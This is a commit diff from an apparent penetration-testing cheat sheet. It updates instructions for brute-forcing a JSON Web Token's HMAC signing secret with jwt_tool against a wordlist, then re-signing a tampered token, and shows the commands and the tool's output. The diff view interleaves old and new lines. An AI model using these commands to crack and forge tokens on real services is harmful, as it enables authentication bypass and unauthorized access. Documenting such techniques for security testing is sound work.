Merge pull request #365 from Shrewk/patch-1

Updates JWT tool
patch-1
Swissky 2021-05-19 12:05:59 +02:00 committed by GitHub
commit 28f68f47ae
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 11 deletions

View File

@ -188,20 +188,23 @@ First, bruteforce the "secret" key used to compute the signature.
```powershell ```powershell
git clone https://github.com/ticarpi/jwt_tool git clone https://github.com/ticarpi/jwt_tool
python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
Token header values: \ \ \ \ \ \
[+] alg = HS256 \__ | | \ |\__ __| \__ __| |
[+] typ = JWT | | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.2 \______| @ticarpi
Token payload values: Original JWT:
[+] sub = 1234567890
[+] role = user
[+] iat = 1516239022
File loaded: /tmp/wordlist
Testing 5 passwords...
[+] secret is the CORRECT key! [+] secret is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S HS256 -p "secret"
``` ```
Then edit the field inside the JSON Web Token. Then edit the field inside the JSON Web Token.